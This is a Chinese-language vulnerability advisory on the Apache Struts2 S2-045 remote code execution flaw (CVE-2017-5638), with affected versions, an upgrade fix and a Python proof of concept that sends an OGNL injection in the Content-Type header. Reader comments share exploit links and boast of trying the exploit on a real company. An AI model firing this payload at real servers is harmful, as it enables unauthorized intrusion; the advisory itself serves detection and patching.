CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 漏洞列表
  3. 正文

cve-2017-5638

2018年11月12日 954点热度 0人点赞 0条评论
  • FB招聘站
  • 分类阅读
  • 专栏
  • 公开课
  • FIT 2019
  • 企业服务
  • 用户服务
  • 搜索
  • 投稿
  • 登录
  • 注册

【漏洞预警】Apache Struts2 曝任意代码执行漏洞 (S2-045,CVE-2017-5638)

漏洞盒子2017-03-07共2261121人围观 ,发现 35 个不明物体漏洞

struts2漏洞截图.png

FreeBuf上次曝Struts 2的漏洞已经是半年多以前的事情了。这次的漏洞又是个RCE远程代码执行漏洞。简单来说,基于Jakarta Multipart解析器进行文件上传时,利用漏洞可进行远程代码执行。 该漏洞由安恒信息Nike Zheng上报。

Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。

漏洞编号

CVE-2017-5638

漏洞简介

Struts使用的Jakarta解析文件上传请求包不当,当远程攻击者构造恶意的Content-Type,可能导致远程命令执行。

实际上在default.properties文件中,struts.multipart.parser的值有两个选择,分别是jakarta和pell(另外原本其实也有第三种选择cos)。其中的jakarta解析器是Struts 2框架的标准组成部分。默认情况下jakarta是启用的,所以该漏洞的严重性需要得到正视。

影响范围

Struts 2.3.5 – Struts 2.3.31

Struts 2.5 – Struts 2.5.10

修复方案

如果你正在使用基于Jakarta的文件上传Multipart解析器,请升级到Apache Struts 2.3.32或2.5.10.1版;或者也可以切换到不同的实现文件上传Multipart解析器。

漏洞盒子流行漏洞检测 与 网藤风险感知 已支持对该漏洞的检测,申请免费使用

漏洞PoC

import requests

import sys

def poc(url):

payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"

headers = {}

headers["Content-Type"] = payload

r = requests.get(url, headers=headers)

if "105059592" in r.content:

return True

return False

if __name__ == '__main__':

if len(sys.argv) == 1:

print "python s2-045.py target"

sys.exit()

if poc(sys.argv[1]):

print "vulnerable"

else:

print "not vulnerable"

* 参考来源:Apache,转载请注明来自FreeBuf.COM

漏洞盒子

漏洞盒子114 篇文章等级: 7级
|
|
  • 上一篇:【更新PoC】潜伏11年的Linux内核提权漏洞曝光
  • 下一篇:关于Apache Struts2(S2-045)漏洞情况的通报

这些评论亮了

  • hackyzh(1级)回复
    安恒对struts2的研究挺厉害的啊
    )15(亮了
  • maxshell(1级)回复
    535114467,群文件里面已经有exp了,poc也出了 大佬们过来搞事
    )11(亮了
  • 求Apache Struts 2.3.32下载回复
    求Apache Struts 2.3.32下载地址。
    )9(亮了
  • poc回复
    Poc呢 :mrgreen:
    )8(亮了
  • 就不告诉你回复
    poc http://ge.tt/5OjOU9j2
    )8(亮了
发表评论

已有 35 条评论

  • hackyzh (1级) 2017-03-07回复1楼

    安恒对struts2的研究挺厉害的啊

    亮了(15)
    • !!! 2017-03-07回复

      @ hackyzh  这是安恒发现的,你这是忽悠人?

      亮了(4)
      • dophc (1级) 2017-03-07回复

        @ !!! 貌似真是安恒研究院搞得

        亮了(6)
  • test124 (3级) 2017-03-07回复2楼

    火钳留名

    亮了(5)
  • poc 2017-03-07回复3楼

    Poc呢 :mrgreen:

    亮了(8)
  • dalao大屌 2017-03-07回复4楼

    没POC都是耍流氓 = =

    亮了(4)
  • 求Apache Struts 2.3.32下载 2017-03-07回复5楼

    求Apache Struts 2.3.32下载地址。

    亮了(9)
  • xsser 2017-03-07回复6楼

    两会搞事情呀

    亮了(7)
  • FreeBuf 2017-03-07回复7楼

    转发微博

    亮了(4)
  • anting (3级)愿用十倍努力换成功一个 2017-03-07回复8楼

    二会别搞事情呀

    亮了(5)
    • 我是二货 2017-03-07回复

      @ anting  +1

      亮了(4)
  • Apache Struts 2.3.32 在哪能下到? 2017-03-07回复9楼

    @ 求Apache Struts 2.3.32下载

    亮了(4)
  • maxshell (1级) 2017-03-07回复10楼

    535114467,群文件里面已经有exp了,poc也出了 大佬们过来搞事

    亮了(11)
    • 自律 (5级) 2017-03-07回复

      @ maxshell  以get

      亮了(2)
    • cwlohome (1级) 2017-03-07回复

      @ maxshell  以进群潜水~

      亮了(3)
  • gtl (1级) 2017-03-07回复11楼

    6666

    亮了(3)
  • 就不告诉你 2017-03-07回复12楼

    poc http://ge.tt/5OjOU9j2

    亮了(8)
  • dophc (1级) 2017-03-07回复13楼

    貌似发现了个url,试了下,竟然是root :wink:
    这就尴尬了

    亮了(5)
  • Apache Struts 2.3.32 在哪能下到? 2017-03-07回复14楼

    Apache Struts 2.3.32 在哪能下到?

    亮了(3)
  • plane636 (4级) 2017-03-07回复15楼

    求Apache Struts 2.3.32下载

    亮了(4)
  • VicLevin (1级)追寻黎明前的黑暗,感受暴风前的宁静 2017-03-07回复16楼

    一大堆大佬正在赶来

    亮了(4)
  • plane636 (4级) 2017-03-07回复17楼

    下载地址:https://github.com/apache/struts/releases

    亮了(5)
  • XChen (1级) 2017-03-07回复18楼

    朋友圈都被这个刷屏了

    亮了(3)
  • 义水黄沙 2017-03-07回复19楼

    关注下

    亮了(0)
  • 豆浆包子 2017-03-08回复20楼

    这货漏洞一个接着一个。

    亮了(0)
  • dawner (9级)黎明已经过去,黑暗就在眼前! 2017-03-08回复21楼

    我只能说,这帮刷洞为生的人手贼快 :arrow:

    亮了(1)
  • anything24 2017-03-08回复22楼

    https版的命令执行,请叫我雷锋http://www.reg008.com/forum/forum.php?mod=viewthread&tid=9&extra=

    亮了(2)
  • fuck script kiddies 2017-03-08回复23楼

    你们这群script kiddies,过来扫啊,直接ban你们

    亮了(3)
  • Sophone 2017-03-08回复24楼

    2.3.16.3版本没发现这个问题,求大神解释

    亮了(0)
  • 遗憾哥 2017-03-08回复25楼

    刚拿EXP试了下中国X寿,发现效果杠杠滴,泡碗面吃饱了准备来搞条大的,你妹的已经堵上了 。。。

    亮了(0)
  • 彭雨菲yang 2017-03-09回复26楼
    亮了(0)
  • TKing 2017-03-09回复27楼

    https://github.com/generalthink/Struts2-S2-045-Problem-Solve

    漏洞解决方案

    亮了(0)
  • freedom1027 2017-03-09回复28楼
    亮了(1)
  • 彭菲1027 2017-03-09回复29楼
    亮了(0)
  • zoonctrl (6级)该怎么做好信息安全? 2017-12-07回复30楼

    安恒在web上真是数一数二的安全企业,666

    亮了(2)

 

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

漏洞盒子

漏洞盒子

互联网安全众测平台

114文章数4评论数

最近文章

漏洞预警 | WebLogic WLS核心组件反序列化漏洞(CVE-2018-2893)

2018.07.18

24小时「漏洞饥饿游戏」| 见证各路Dalao角逐巅峰,更有神秘众测项目等你挑战

2018.05.10

【豪华出境游】4.28,漏洞盒子精英白帽团出发喽 | 白帽梦想趴

2018.04.26

浏览更多

相关阅读

  • Struts2安全漏洞频出 ,多因Apache官方代码编写不严谨
  • 【漏洞预警】Apache Struts2 曝任意代码执行漏洞 (S2-045,CVE-2017-5638)
  • 海事安全篇:船舶黑匣子VDR是如何被黑掉的?
  • Adobe Flash CVE-2014-0497漏洞分析
  • HEIST攻击:从HTTPS加密数据中获取明文

特别推荐

关注我们 分享每日精选文章

活动预告

  • 11月

    FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气

    已结束
  • 10月

    【16课时-连载中】挖掘CVE不是梦(系列课程2)

    已结束
  • 10月

    【首节课仅需1元】挖掘CVE不是梦

    已结束
  • 9月

    【已结束】自炼神兵之自动化批量刷SRC

    已结束

FREEBUF

  • 免责声明
  • 协议条款
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2018年11月12日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me